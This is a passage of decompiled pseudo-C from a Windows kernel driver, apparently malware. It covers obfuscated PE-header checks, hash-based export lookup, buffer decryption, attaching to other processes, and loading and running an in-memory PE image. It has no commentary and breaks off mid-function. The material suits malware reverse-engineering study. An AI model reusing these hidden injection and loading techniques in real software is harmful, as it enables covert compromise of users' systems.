int __stdcall sub_11B04(int a1, const char *a2, unsigned int a3, int a4, int a5)

{

int result; // eax@2

const char *v6; // ebx@7

int v7; // eax@17

unsigned int v8; // ecx@17

int v9; // eax@24

int v10; // [sp+Ch] [bp-4h]@7

int v11; // [sp+Ch] [bp-4h]@14

*(_BYTE *)a5 = 0;

if ( sub_10886(0) )

{

result = (int)sub_11ABC(a2, a3);

if ( result )

{

if ( *(_DWORD *)a4 && result != *(_DWORD *)a4 )

*(_BYTE *)a5 = 1;

else

*(_DWORD *)a4 = result;

}

}

else

{

v6 = a2;

result = a3 - 10;

v10 = (int)a2;

if ( (unsigned int)a2 < a3 - 10 )

{

while ( 2 )

{

for ( result = v10; ; ++result )

{

if ( result > a3 - 14 )

{

v11 = 0;

goto LABEL_15;

}

if ( *(_DWORD *)result == dword_12628 )

break;

}

v11 = result;

LABEL_15:

if ( v11 )

{

if ( !strncmp((const char *)v11, (const char *)&dword_12628, 5) )

{

v8 = 0;

v7 = v11;

while ( (unsigned int)&v6[v8] < v11 )

{

if ( *(_BYTE *)v7 == -24

&& (NTSTATUS (__stdcall *)(HANDLE, PVOID *, ULONG, PULONG, ULONG, ULONG))(*(_DWORD *)(v7 + 1) + v7 + 5) == ZwAllocateVirtualMemory )

{

v9 = sub_11A4A(v11, a1, a3);

if ( !v9 )

break;

if ( !*(_DWORD *)a4 || v9 == *(_DWORD *)a4 )

{

*(_DWORD *)a4 = v9;

break;

}

result = a5;

*(_BYTE *)a5 = 1;

return result;

}

++v8;

--v7;

if ( v8 >= 0x78 )

break;

}

}

v10 = v11 + 1;

result = v10;

if ( v10 < a3 - 10 )

{

v6 = a2;

continue;

}

}

break;

}

}

}

return result;

}

// 12628: using guessed type int dword_12628;

//----- (00011C14) --------------------------------------------------------

int *__cdecl sub_11C14()

{

int v0; // ebx@1

int v1; // eax@2

int v2; // ecx@3

__int16 v3; // di@4

int v4; // esi@4

int v5; // edx@5

unsigned int v6; // ecx@6

int v7; // eax@8

const char *v8; // ST04_4@8

char v10; // [sp+Ch] [bp-2Ch]@3

int v11; // [sp+20h] [bp-18h]@4

unsigned __int16 v12; // [sp+24h] [bp-14h]@4

int v13; // [sp+2Ch] [bp-Ch]@2

int v14; // [sp+30h] [bp-8h]@4

char v15; // [sp+37h] [bp-1h]@8

v0 = 0;

dword_146A8 = 0;

if ( !dword_146AC )

{

v1 = sub_1098E();

v13 = v1;

if ( v1 )

{

if ( !sub_121E1((int)&v10, v1, 1) )

{

v3 = v12;

v4 = v11;

v14 = 0;

if ( v12 > 0u )

{

while ( 1 )

{

if ( sub_119AE(v2, 40 * (unsigned __int16)v0 + v4) )

{

v6 = *(_DWORD *)(v5 + 16);

if ( *(_DWORD *)(v5 + 8) < v6 )

v6 = *(_DWORD *)(v5 + 8);

v7 = v13 + *(_DWORD *)(v5 + 12);

v8 = (const char *)(v13 + *(_DWORD *)(v5 + 12));

v15 = 1;

sub_11B04((int)&v10, v8, v7 + v2, (int)&v14, (int)&v15);

if ( v15 )

break;

}

++v0;

if ( (_WORD)v0 >= (unsigned __int16)v3 )

{

if ( !v14 )

break;

dword_146A8 = v14;

return &dword_146A8;

}

}

}

}

}

dword_146AC = -1073741823;

}

return &dword_146A8;

}

// 146A8: using guessed type int dword_146A8;

// 146AC: using guessed type int dword_146AC;

//----- (00011CCC) --------------------------------------------------------

int __stdcall sub_11CCC(int a1)

{

int v1; // eax@1

int result; // eax@2

int v3; // ebx@4

int v4; // [sp+0h] [bp-8h]@6

int v5; // [sp+4h] [bp-4h]@6

v1 = *(_DWORD *)(a1 + 96);

*(_DWORD *)(a1 + 28) = 0;

if ( *(_DWORD *)(v1 + 8) != 40 || *(_DWORD *)(v1 + 4) != 40 )

{

result = -1073741811;

}

else

{

v3 = *(_DWORD *)(a1 + 12);

if ( *(_DWORD *)v3 == -1347686387 )

{

v5 = 0;

sub_10A8A((int)&v4, &v5);

result = v5;

if ( !v5 )

{

result = (*(int (__stdcall **)(_DWORD, int, int, _DWORD, int))v4)(

*(_DWORD *)(v3 + 8),

v3 + 16,

v3 + 24,

*(_DWORD *)(v3 + 32),

v3 + 32);

if ( !result )

{

*(_DWORD *)(a1 + 28) = 40;

result = 0;

}

}

}

else

{

result = -1073741811;

}

}

return result;

}

//----- (00011D46) --------------------------------------------------------

char __stdcall sub_11D46(int a1, unsigned int a2)

{

char result; // al@1

unsigned int v3; // ecx@1

v3 = 0;

result = 0;

if ( a2 )

{

do

result += *(_BYTE *)(v3++ + a1);

while ( v3 < a2 );

}

return result;

}

//----- (00011D62) --------------------------------------------------------

NTSTATUS __userpurge sub_11D62<eax>(LSA_UNICODE_STRING *a1<eax>, PUNICODE_STRING ValueName, int a3)

{

NTSTATUS v3; // esi@1

OBJECT_ATTRIBUTES ObjectAttributes; // [sp+8h] [bp-20h]@1

int v6; // [sp+20h] [bp-8h]@1

HANDLE Handle; // [sp+24h] [bp-4h]@1

ObjectAttributes.ObjectName = a1;

LOBYTE(v6) = 0;

Handle = 0;

ObjectAttributes.Length = 24;

ObjectAttributes.RootDirectory = 0;

ObjectAttributes.Attributes = 64;

ObjectAttributes.SecurityDescriptor = 0;

ObjectAttributes.SecurityQualityOfService = 0;

v3 = ZwOpenKey(&Handle, 0x20019u, &ObjectAttributes);

LOBYTE(v6) = v3 == 0;

if ( !v3 )

v3 = sub_11DD6((int)&v6, ValueName, a3);

if ( (_BYTE)v6 )

{

LOBYTE(v6) = 0;

ZwClose(Handle);

}

return v3;

}

//----- (00011DD6) --------------------------------------------------------

signed int __stdcall sub_11DD6(int a1, PUNICODE_STRING ValueName, int a3)

{

PVOID v4; // edi@10

signed int v5; // esi@14

int v6; // eax@16

int v7; // eax@17

PVOID v8; // [sp-8h] [bp-34h]@7

ULONG v9; // [sp-4h] [bp-30h]@7

PVOID P; // [sp+10h] [bp-1Ch]@5

ULONG ResultLength; // [sp+20h] [bp-Ch]@4

NTSTATUS v12; // [sp+24h] [bp-8h]@5

if ( !*(_BYTE *)a1

|| (ResultLength = 0,

ZwQueryValueKey(*(HANDLE *)(a1 + 4), ValueName, KeyValuePartialInformation, 0, 0, &ResultLength) != -1073741789) )

return -1073741823;

v12 = 0;

sub_105A0((int)&v12, ResultLength, (int)&P, 0);

if ( v12 )

{

if ( !P )

return v12;

v9 = 0;

v8 = P;

LABEL_8:

ExFreePoolWithTag(v8, v9);

return v12;

}

v4 = P;

v12 = ZwQueryValueKey(*(HANDLE *)(a1 + 4), ValueName, KeyValuePartialInformation, P, ResultLength, &ResultLength);

if ( v12 )

{

if ( !v4 )

return v12;

v9 = 0;

v8 = v4;

goto LABEL_8;

}

if ( *((_DWORD *)v4 + 1) == 3 )

{

v6 = (int)ExAllocatePool(0, 0x10u);

if ( v6 )

{

v7 = sub_105A0((int)&v12, *((_DWORD *)v4 + 2), v6, (char *)v4 + 12);

v4 = P;

}

else

{

v7 = 0;

}

sub_1076E(a3, (PVOID *)v7);

v5 = 0;

if ( v12 )

{

v5 = v12;

goto LABEL_15;

}

if ( *(_DWORD *)(a3 + 4) )

goto LABEL_15;

}

v5 = -1073741823;

LABEL_15:

ExFreePoolWithTag(v4, 0);

return v5;

}

//----- (00011EC6) --------------------------------------------------------

int __usercall sub_11EC6<eax>(char a1<al>, int a2<ecx>, unsigned int a3<esi>)

{

unsigned int v3; // edx@2

unsigned int v4; // eax@4

int result; // eax@6

char v7; // [sp+8h] [bp-10h]@1

char v8; // [sp+Ch] [bp-Ch]@1

signed int v9; // [sp+10h] [bp-8h]@1

unsigned int v10; // [sp+14h] [bp-4h]@1

v10 = a3 >> 1;

v7 = a1 ^ 0xD;

v8 = a1 ^ 0xEF;

v9 = 7;

do

{

v3 = 0;

if ( a3 )

{

do

{

*(_BYTE *)(v3 + a2) ^= v9 * v8 + v3 * v7;

++v3;

}

while ( v3 < a3 );

}

v4 = 0;

if ( v10 )

{

do

{

*(_BYTE *)(v4 + a2) ^= *(_BYTE *)(((a3 + 1) >> 1) + a2 + v4);

++v4;

}

while ( v4 < v10 );

}

for ( result = a3 - 1; (unsigned int)result >= 1; --result )

*(_BYTE *)(result + a2) -= *(_BYTE *)(result + a2 - 1);

}

while ( v9-- - 1 >= 0 );

return result;

}

//----- (00011F42) --------------------------------------------------------

int __stdcall sub_11F42(int a1, int a2, HANDLE Handle)

{

int v3; // eax@2

int v4; // ecx@3

int v5; // eax@5

char ProcessInformation; // [sp+Ch] [bp-34h]@2

int v8; // [sp+10h] [bp-30h]@3

CPPEH_RECORD ms_exc; // [sp+28h] [bp-18h]@2

*(_DWORD *)a1 = 0;

*(_BYTE *)(a1 + 4) = 1;

if ( !*(_DWORD *)a2 )

{

ms_exc.disabled = 0;

v3 = sub_12000(Handle, &ProcessInformation);

*(_DWORD *)a2 = v3;

if ( !v3 )

{

v4 = v8;

if ( v8 && (v5 = *(_DWORD *)(v8 + 8)) != 0 )

{

*(_DWORD *)a1 = v5;

*(_BYTE *)(a1 + 4) = *(_BYTE *)(v4 + 2) != 0;

}

else

{

*(_DWORD *)a2 = -1073741823;

}

}

ms_exc.disabled = -1;

}

return a1;

}

//----- (00011FC0) --------------------------------------------------------

int __userpurge sub_11FC0<eax>(int a1<esi>, int a2, int a3)

{

*(_BYTE *)a1 = 0;

sub_12094(a1 + 4, a2, a3);

memset((void *)(a1 + 12), 0, 0x18u);

if ( !*(_DWORD *)a2 )

{

KeStackAttachProcess(*(_DWORD *)(a1 + 8), a1 + 12);

*(_BYTE *)a1 = 1;

}

return a1;

}

// 12604: using guessed type int __stdcall KeStackAttachProcess(_DWORD, _DWORD);

//----- (00012000) --------------------------------------------------------

int __stdcall sub_12000(HANDLE Handle, PVOID ProcessInformation)

{

int result; // eax@4

NTSTATUS v3; // esi@5

char v4; // [sp+10h] [bp-10h]@1

PVOID Object; // [sp+14h] [bp-Ch]@3

ULONG ReturnLength; // [sp+18h] [bp-8h]@6

int v7; // [sp+1Ch] [bp-4h]@1

v7 = 0;

sub_12094((int)&v4, (int)&v7, (int)Handle);

if ( v7 )

{

if ( v4 )

{

v4 = 0;

ObfDereferenceObject(Object);

}

result = v7;

}

else

{

Handle = 0;

v3 = ObOpenObjectByPointer(Object, 0, 0, 0, 0, 0, &Handle);

if ( !v3 )

{

ReturnLength = 0;

v3 = ZwQueryInformationProcess(Handle, 0, ProcessInformation, 0x18u, &ReturnLength);

}

if ( Handle )

ZwClose(Handle);

if ( v4 )

{

v4 = 0;

ObfDereferenceObject(Object);

}

result = v3;

}

return result;

}

// 1260C: using guessed type int __stdcall ObOpenObjectByPointer(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD);

//----- (00012094) --------------------------------------------------------

int __userpurge sub_12094<eax>(int a1<ebx>, int a2<edi>, int a3)

{

char v3; // zf@1

int v4; // eax@2

*(_DWORD *)(a1 + 4) = 0;

v3 = *(_DWORD *)a2 == 0;

*(_BYTE *)a1 = 0;

if ( v3 )

{

v4 = PsLookupProcessByProcessId(a3, a1 + 4);

*(_DWORD *)a2 = v4;

if ( !v4 )

{

if ( *(_DWORD *)(a1 + 4) )

*(_BYTE *)a1 = 1;

else

*(_DWORD *)a2 = -1073741823;

}

}

return a1;

}

// 12610: using guessed type int __stdcall PsLookupProcessByProcessId(_DWORD, _DWORD);

//----- (000120CC) --------------------------------------------------------

LONG_PTR __usercall sub_120CC<eax>(PVOID Object<ecx>, LONG_PTR result<eax>)

{

void *v2; // ecx@2

if ( *(_BYTE *)result )

{

v2 = *(void **)(result + 4);

*(_BYTE *)result = 0;

result = ObfDereferenceObject(v2);

}

return result;

}

//----- (000120DE) --------------------------------------------------------

int __cdecl sub_120DE(int a1)

{

int result; // eax@1

int v2; // edx@1

char v3; // cl@1

int v4; // esi@2

v2 = a1;

v3 = *(_BYTE *)a1;

for ( result = 0; *(_BYTE *)v2; result = v4 )

{

v4 = result * (7 * result + 1) + v3 * (17 * v3 + 12);

++v2;

v3 = *(_BYTE *)v2;

}

return result;

}

//----- (0001210F) --------------------------------------------------------

int __cdecl sub_1210F(int a1, unsigned int a2)

{

unsigned __int16 v2; // bx@1

int v3; // edi@1

int v4; // esi@1

int v5; // eax@3

unsigned int v6; // ecx@3

int v7; // eax@5

int result; // eax@8

int v9; // [sp+14h] [bp+8h]@2

v2 = *(_WORD *)(a1 + 24);

v4 = *(_DWORD *)(a1 + 20);

v3 = 0;

if ( v2 <= 0u )

{

LABEL_8:

result = 0;

}

else

{

v9 = *(_DWORD *)(a1 + 8);

while ( 1 )

{

v5 = v4 + 40 * (unsigned __int16)v3;

v6 = *(_DWORD *)(v5 + 8);

if ( v6 >= *(_DWORD *)(v5 + 16) )

v6 = *(_DWORD *)(v5 + 16);

v7 = v9 + *(_DWORD *)(v5 + 12);

if ( a2 >= v7 )

{

if ( a2 < v6 + v7 )

break;

}

++v3;

if ( (_WORD)v3 >= v2 )

goto LABEL_8;

}

result = v4 + 40 * (unsigned __int16)v3;

}

return result;

}

//----- (0001216B) --------------------------------------------------------

signed int __usercall sub_1216B<eax>(int a1<eax>, unsigned int a2<ebx>)

{

int v2; // esi@1

signed int result; // eax@2

int v4; // edi@3

int v5; // eax@6

unsigned int v6; // ecx@6

unsigned int v7; // eax@8

int v8; // esi@12

unsigned __int16 v9; // [sp+4h] [bp-4h]@1

v2 = *(_DWORD *)(a1 + 20);

v9 = *(_WORD *)(a1 + 24);

if ( a2 < *(_DWORD *)(a1 + 26) )

{

v4 = 0;

if ( !*(_DWORD *)(a1 + 4) )

goto LABEL_17;

if ( *(_WORD *)(a1 + 24) <= 0u )

goto LABEL_14;

while ( 1 )

{

v5 = v2 + 40 * (unsigned __int16)v4;

v6 = *(_DWORD *)(v5 + 8);

if ( v6 >= *(_DWORD *)(v5 + 16) )

v6 = *(_DWORD *)(v5 + 16);

v7 = *(_DWORD *)(v5 + 12);

if ( a2 >= v7 )

{

if ( a2 < v6 + v7 )

break;

}

++v4;

if ( (_WORD)v4 >= v9 )

goto LABEL_14;

}

v8 = *(_DWORD *)(40 * (unsigned __int16)v4 + v2 + 36);

if ( v8 & 0x2000000 || !(v8 & 0x40000000) )

LABEL_14:

result = 0;

else

LABEL_17:

result = 1;

}

else

{

result = 0;

}

return result;

}

//----- (000121E1) --------------------------------------------------------

signed int __cdecl sub_121E1(int a1, int a2, int a3)

{

int v4; // eax@3

unsigned __int16 v5; // cx@4

int v6; // edx@7

int v7; // ecx@7

__int16 v8; // dx@12

if ( *(_WORD *)a2 != 23117 || (v4 = a2 + *(_DWORD *)(a2 + 60), (*(_DWORD *)v4 ^ 0xF750F284) != -145705004) )

return 1;

v5 = *(_WORD *)(v4 + 4);

if ( 22531 == (v5 ^ 0x594F) )

{

if ( (*(_WORD *)(v4 + 24) ^ 0x5908) == 22531 && *(_WORD *)(v4 + 20) == 224 )

{

v7 = a1;

*(_DWORD *)a1 = 0;

v6 = v4 + 120;

LABEL_12:

*(_DWORD *)(v7 + 16) = v6;

*(_DWORD *)(v7 + 26) = *(_DWORD *)(v4 + 80);

*(_DWORD *)(v7 + 20) = *(_WORD *)(v4 + 20) + v4 + 24;

v8 = *(_WORD *)(v4 + 6);

*(_DWORD *)(v7 + 12) = v4;

*(_DWORD *)(v7 + 4) = a3;

*(_WORD *)(v7 + 24) = v8;

*(_DWORD *)(v7 + 8) = a2;

return 0;

}

}

else

{

if ( 22531 == (v5 ^ 0xDE67) && (*(_WORD *)(v4 + 24) ^ 0x5A08) == 22531 && *(_WORD *)(v4 + 20) == 240 )

{

v7 = a1;

*(_DWORD *)a1 = 1;

v6 = v4 + 136;

goto LABEL_12;

}

}

return 1;

}

//----- (000122B3) --------------------------------------------------------

signed int __cdecl sub_122B3(int a1, unsigned int a2)

{

signed int result; // eax@1

result = sub_1216B(a1, a2);

if ( result )

result = a2 + *(_DWORD *)(a1 + 8);

return result;

}

//----- (000122D0) --------------------------------------------------------

bool __cdecl sub_122D0(int a1, unsigned int a2, int a3, int a4)

{

int v4; // esi@1

bool result; // eax@2

unsigned int v6; // eax@3

v4 = *(_DWORD *)(a1 + 16) + 8 * a2;

if ( a2 >= 0x10 )

return 1;

v6 = *(_DWORD *)v4;

if ( *(_DWORD *)v4 )

{

if ( v6 + *(_DWORD *)(v4 + 4) > *(_DWORD *)(a1 + 26) )

return 1;

*(_DWORD *)a3 = sub_122B3(a1, *(_DWORD *)v4);

*(_DWORD *)a4 = *(_DWORD *)(v4 + 4);

result = *(_DWORD *)a3 == 0;

}

else

{

LOBYTE(v6) = *(_DWORD *)(v4 + 4) == v6;

result = v6 + 1;

}

return result;

}

//----- (00012323) --------------------------------------------------------

signed int __usercall sub_12323<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4)

{

signed int v4; // eax@1

unsigned int v5; // esi@1

unsigned int v6; // eax@3

signed int result; // eax@4

v5 = a1;

v4 = sub_122B3(a2, *(_DWORD *)(a1 + 28));

if ( !v4

|| (unsigned int)a4 >= *(_DWORD *)(v5 + 20)

|| (v6 = *(_DWORD *)(v4 + 4 * a4), !v6)

|| (result = sub_122B3(a2, v6), !result)

|| result >= v5 && result < a3 + v5 )

result = 0;

return result;

}

//----- (0001236B) --------------------------------------------------------

signed int __cdecl sub_1236B(int a1, int a2)

{

unsigned int v2; // esi@1

signed int result; // eax@2

unsigned int v4; // edi@3

unsigned int v5; // ebx@6

int v6; // eax@7

int v7; // [sp+4h] [bp-Ch]@1

int v8; // [sp+8h] [bp-8h]@4

int v9; // [sp+Ch] [bp-4h]@1

v2 = 0;

if ( sub_122D0(a1, 0, (int)&v9, (int)&v7) )

{

result = 0;

}

else

{

v4 = v9;

v9 = sub_122B3(a1, *(_DWORD *)(v9 + 32));

if ( v9 && (v8 = sub_122B3(a1, *(_DWORD *)(v4 + 36))) != 0 )

{

v5 = *(_DWORD *)(v4 + 24);

if ( v5 )

{

do

{

v6 = sub_122B3(a1, *(_DWORD *)(v9 + 4 * v2));

if ( !v6 )

break;

if ( sub_120DE(v6) == a2 )

return sub_12323(v4, a1, v7, *(_WORD *)(v8 + 2 * v2));

++v2;

}

while ( v2 < v5 );

}

result = 0;

}

else

{

result = 0;

}

}

return result;

}

//----- (00012A24) --------------------------------------------------------

signed int __usercall sub_12A24<eax>(int a1<esi>)

{

int v1; // edi@1

int (__stdcall *v2)(_DWORD); // ebx@1

int v3; // eax@1

int v4; // eax@1

signed int result; // eax@2

v1 = sub_12D71((void *)0x2B8);

v2 = *(int (__stdcall **)(_DWORD))(v1 + 32);

*(_BYTE *)a1 = 21;

*(_DWORD *)(a1 + 1) = 57;

*(_DWORD *)(a1 + 13) = sub_12D71((void *)0x652);

*(_DWORD *)(a1 + 17) = sub_12D71((void *)0x686);

*(_DWORD *)(a1 + 21) = *(_DWORD *)(v1 + 40);

*(_DWORD *)(a1 + 25) = *(_DWORD *)(v1 + 24);

*(_DWORD *)(a1 + 29) = *(_DWORD *)(v1 + 72);

v3 = sub_12D71((void *)0x260);

v4 = v2(v3);

*(_DWORD *)(a1 + 33) = v4;

if ( v4 )

{

*(_DWORD *)(a1 + 41) = 0;

*(_DWORD *)(a1 + 45) = 0;

*(_DWORD *)(a1 + 49) = 1;

result = 0;

}

else

{

result = 1;

}

return result;

}

//----- (00012A95) --------------------------------------------------------

signed int __cdecl sub_12A95(int a1)

{

signed int result; // eax@1

int v2; // edi@1

int v3; // eax@2

int v4; // eax@2

int v5; // ecx@4

char v6; // [sp+Ch] [bp-84h]@4

char v7; // [sp+4Ch] [bp-44h]@1

int v8; // [sp+51h] [bp-3Fh]@2

int v9; // [sp+55h] [bp-3Bh]@2

int (__cdecl *v10)(char *); // [sp+88h] [bp-8h]@1

int (__cdecl *v11)(char *, int); // [sp+8Ch] [bp-4h]@1

v2 = *(_DWORD *)(a1 + 88);

v11 = (int (__cdecl *)(char *, int))(v2 + 149 + *(_DWORD *)(v2 + 113));

v10 = (int (__cdecl *)(char *))(v2 + 149 + *(_DWORD *)(v2 + 129));

*(_WORD *)(v2 + 149) = 23117;

*(_DWORD *)(v2 + 149 + *(_DWORD *)(v2 + 141)) = 17744;

*(_WORD *)(v2 + 149 + *(_DWORD *)(v2 + 145)) = 267;

result = sub_12A24((int)&v7);

if ( !result )

{

v3 = *(_DWORD *)(v2 + 1);

v8 = v2 + 149;

v9 = v3;

v4 = sub_12D71((void *)0x350);

result = v11(&v7, v4);

if ( !result )

{

result = sub_12A24((int)&v7);

if ( !result )

{

v5 = *(_DWORD *)(a1 + 96);

v9 = *(_DWORD *)(a1 + 104);

v8 = v5;

result = v11(&v7, (int)&v6);

if ( !result )

{

result = v10(&v6);

if ( result )

result = ((int (*)(void))result)();

}

}

}

}

return result;

}

//----- (00012D37) --------------------------------------------------------

bool __usercall sub_12D37<eax>(int a1<eax>, int a2)

{

int (__stdcall *v2)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD); // ecx@1

bool result; // eax@2

int v4; // [sp+0h] [bp-4h]@1

v2 = *(int (__stdcall **)(_DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD, _DWORD))(a1 + 80);

v4 = 0;

if ( v2(*(_DWORD *)(a1 + 144), 2242560, a2, 40, a2, 40, &v4, 0) )

result = v4 != 40;

else

result = 1;

return result;

}

//----- (00012D71) --------------------------------------------------------

int __thiscall sub_12D71(void *this)

{

return (int)((char *)this + 75412);

}

//----- (00013343) --------------------------------------------------------

signed int __usercall sub_13343<eax>(int a1<eax>, unsigned int a2)

{

unsigned int v2; // edi@1

int v4; // ecx@3

unsigned int v5; // ebx@4

int v6; // eax@7

unsigned int v7; // edx@8

int v8; // ecx@8

unsigned int v9; // [sp+8h] [bp-4h]@1

v9 = 0;

LOWORD(v2) = *(_WORD *)(a1 + 24);

if ( *(_DWORD *)a1 || (v4 = *(_DWORD *)(a1 + 12), *(_DWORD *)(v4 + 84) > a2) )

return 2;

v5 = *(_DWORD *)(a1 + 26);

if ( !(*(_DWORD *)(a1 + 26) % *(_DWORD *)(v4 + 56)) && *(_WORD *)(v4 + 6) )

{

v2 = (unsigned __int16)v2;

if ( !(_WORD)v2 )

return 0;

v6 = *(_DWORD *)(a1 + 20) + 16;

while ( 1 )

{

v8 = *(_DWORD *)v6;

v7 = *(_DWORD *)(v6 - 8);

if ( *(_DWORD *)v6 >= v7 )

v8 = *(_DWORD *)(v6 - 8);

if ( v8 + *(_DWORD *)(v6 + 4) > a2 || v7 + *(_DWORD *)(v6 - 4) > v5 )

break;

v6 += 40;

++v9;

if ( v9 >= v2 )

return 0;

}

}

return 2;

}

//----- (000133BF) --------------------------------------------------------

int __usercall sub_133BF<eax>(int a1<eax>, int a2, int a3)

{

int result; // eax@1

int v4; // ecx@1

int v5; // ebx@2

int v6; // esi@2

int v7; // edx@3

int v8; // ecx@5

int i; // edi@5

v4 = *(_DWORD *)(a1 + 20);

result = *(_WORD *)(a1 + 24);

if ( result )

{

v6 = v4 + 8;

v5 = result;

do

{

v7 = *(_DWORD *)v6;

if ( *(_DWORD *)(v6 + 8) < *(_DWORD *)v6 )

v7 = *(_DWORD *)(v6 + 8);

v8 = *(_DWORD *)(a2 + 5) + *(_DWORD *)(v6 + 12);

result = a3 + *(_DWORD *)(v6 + 4);

for ( i = v7; i; ++v8 )

{

--i;

*(_BYTE *)result++ = *(_BYTE *)v8;

}

v6 += 40;

--v5;

}

while ( v5 );

}

return result;

}

//----- (00013409) --------------------------------------------------------

int __usercall sub_13409<eax>(int a1<eax>, int a2, int a3, int a4)

{

unsigned int v4; // edi@1

int v5; // eax@4

char v6; // dl@4

int v7; // ecx@4

int v8; // esi@5

int v10; // [sp+Ch] [bp-Ch]@2

unsigned int v11; // [sp+10h] [bp-8h]@1

int v12; // [sp+14h] [bp-4h]@2

v4 = 0;

v11 = *(_DWORD *)(a1 + 45);

if ( v11 )

{

v10 = *(_DWORD *)(a1 + 41);

v12 = *(_DWORD *)(a1 + 41);

while ( 1 )

{

if ( !sub_13CC0(a2, *(_DWORD *)v12) )

{

v7 = *(_DWORD *)(v12 + 4);

v6 = *(_BYTE *)v7;

v5 = *(_BYTE *)a3 - *(_BYTE *)v7;

if ( *(_BYTE *)a3 == *(_BYTE *)v7 )

{

v8 = a3 - v7;

do

{

if ( !v6 )

break;

++v7;

v6 = *(_BYTE *)v7;

v5 = *(_BYTE *)(v8 + v7) - *(_BYTE *)v7;

}

while ( *(_BYTE *)(v8 + v7) == *(_BYTE *)v7 );

}

if ( v5 >= 0 )

{

if ( v5 > 0 )

v5 = 1;

if ( !v5 )

break;

}

}

v12 += 12;

++v4;

if ( v4 >= v11 )

goto LABEL_13;

}

*(_DWORD *)a4 = *(_DWORD *)(12 * v4 + v10 + 8);

}

else

{

LABEL_13:

*(_DWORD *)a4 = 0;

}

return 0;

}

//----- (0001356E) --------------------------------------------------------

int __usercall sub_1356E<eax>(unsigned int *a1<eax>, int a2<ebx>, int a3<edi>, int a4, int a5, int a6)

{

unsigned int v6; // eax@1

int v7; // eax@2

signed int v8; // eax@4

int result; // eax@5

int v10; // esi@6

int v11; // eax@9

v6 = *a1;

if ( (signed int)v6 < 0 )

{

v7 = (unsigned __int16)v6;

goto LABEL_9;

}

if ( !v6 || (v8 = sub_138BE(a4, v6), !v8) )

return 4;

v10 = v8 + 2;

result = sub_13409(a2, a5, v8 + 2, a3);

if ( result )

return result;

if ( !*(_DWORD *)a3 )

{

v7 = v10;

LABEL_9:

v11 = (*(int (__stdcall **)(int, int))(a2 + 25))(a6, v7);

*(_DWORD *)a3 = v11;

if ( v11 )

return 0;

return 4;

}

return 0;

}

//----- (0001369C) --------------------------------------------------------

int __thiscall sub_1369C(void *this)

{

return (int)((char *)this - 4116659);

}

//----- (000136F8) --------------------------------------------------------

signed int __cdecl sub_136F8(int a1, int a2, int a3)

{

int v4; // eax@3

unsigned __int16 v5; // cx@4

int v6; // edx@7

int v7; // ecx@7

__int16 v8; // dx@12

if ( *(_WORD *)a2 != 23117 || (v4 = a2 + *(_DWORD *)(a2 + 60), (*(_DWORD *)v4 ^ 0xF750F284) != -145705004) )

return 1;

v5 = *(_WORD *)(v4 + 4);

if ( 22531 == (v5 ^ 0x594F) )

{

if ( (*(_WORD *)(v4 + 24) ^ 0x5908) == 22531 && *(_WORD *)(v4 + 20) == 224 )

{

v7 = a1;

*(_DWORD *)a1 = 0;

v6 = v4 + 120;

LABEL_12:

*(_DWORD *)(v7 + 16) = v6;

*(_DWORD *)(v7 + 26) = *(_DWORD *)(v4 + 80);

*(_DWORD *)(v7 + 20) = *(_WORD *)(v4 + 20) + v4 + 24;

v8 = *(_WORD *)(v4 + 6);

*(_DWORD *)(v7 + 12) = v4;

*(_DWORD *)(v7 + 4) = a3;

*(_WORD *)(v7 + 24) = v8;

*(_DWORD *)(v7 + 8) = a2;

return 0;

}

}

else

{

if ( 22531 == (v5 ^ 0xDE67) && (*(_WORD *)(v4 + 24) ^ 0x5A08) == 22531 && *(_WORD *)(v4 + 20) == 240 )

{

v7 = a1;

*(_DWORD *)a1 = 1;

v6 = v4 + 136;

goto LABEL_12;

}

}

return 1;

}

//----- (000138BE) --------------------------------------------------------

signed int __cdecl sub_138BE(int a1, unsigned int a2)

{

signed int result; // eax@1

result = sub_13B3A(a1, a2);

if ( result )

result = a2 + *(_DWORD *)(a1 + 8);

return result;

}

//----- (000138DB) --------------------------------------------------------

bool __cdecl sub_138DB(int a1, unsigned int a2, int a3, int a4)

{

int v4; // esi@1

bool result; // eax@2

unsigned int v6; // eax@3

v4 = *(_DWORD *)(a1 + 16) + 8 * a2;

if ( a2 >= 0x10 )

return 1;

v6 = *(_DWORD *)v4;

if ( *(_DWORD *)v4 )

{

if ( v6 + *(_DWORD *)(v4 + 4) > *(_DWORD *)(a1 + 26) )

return 1;

*(_DWORD *)a3 = sub_138BE(a1, *(_DWORD *)v4);

*(_DWORD *)a4 = *(_DWORD *)(v4 + 4);

result = *(_DWORD *)a3 == 0;

}

else

{

LOBYTE(v6) = *(_DWORD *)(v4 + 4) == v6;

result = v6 + 1;

}

return result;

}

//----- (0001392E) --------------------------------------------------------

int __cdecl sub_1392E(int a1)

{

int result; // eax@1

int v2; // edx@1

char v3; // cl@1

int v4; // esi@2

v2 = a1;

v3 = *(_BYTE *)a1;

for ( result = 0; *(_BYTE *)v2; result = v4 )

{

v4 = result * (7 * result + 1) + v3 * (17 * v3 + 12);

++v2;

v3 = *(_BYTE *)v2;

}

return result;

}

//----- (00013A4B) --------------------------------------------------------

signed int __usercall sub_13A4B<eax>(unsigned int a1<eax>, int a2, int a3, unsigned __int16 a4)

{

signed int v4; // eax@1

unsigned int v5; // esi@1

unsigned int v6; // eax@3

signed int result; // eax@4

v5 = a1;

v4 = sub_138BE(a2, *(_DWORD *)(a1 + 28));

if ( !v4

|| (unsigned int)a4 >= *(_DWORD *)(v5 + 20)

|| (v6 = *(_DWORD *)(v4 + 4 * a4), !v6)

|| (result = sub_138BE(a2, v6), !result)

|| result >= v5 && result < a3 + v5 )

result = 0;

return result;

}

//----- (00013B3A) --------------------------------------------------------

signed int __usercall sub_13B3A<eax>(int a1<eax>, unsigned int a2<ebx>)

{

int v2; // esi@1

signed int result; // eax@2

int v4; // edi@3

int v5; // eax@6

unsigned int v6; // ecx@6

unsigned int v7; // eax@8

int v8; // esi@12

unsigned __int16 v9; // [sp+4h] [bp-4h]@1

v2 = *(_DWORD *)(a1 + 20);

v9 = *(_WORD *)(a1 + 24);

if ( a2 < *(_DWORD *)(a1 + 26) )

{

v4 = 0;

if ( !*(_DWORD *)(a1 + 4) )

goto LABEL_17;

if ( *(_WORD *)(a1 + 24) <= 0u )

goto LABEL_14;

while ( 1 )

{

v5 = v2 + 40 * (unsigned __int16)v4;

